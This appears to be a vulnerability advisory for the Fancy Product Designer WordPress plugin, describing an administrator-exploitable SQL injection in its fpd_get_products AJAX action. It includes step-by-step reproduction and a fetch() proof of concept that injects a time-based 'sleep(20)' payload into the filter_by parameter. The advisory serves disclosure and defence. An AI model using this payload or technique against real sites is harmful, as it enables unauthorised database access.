Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.
- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, note down the associated nonce
- Send the following fetch() command in your browser's console, and replace $NONCE with the nonce:
```
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))
```
Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.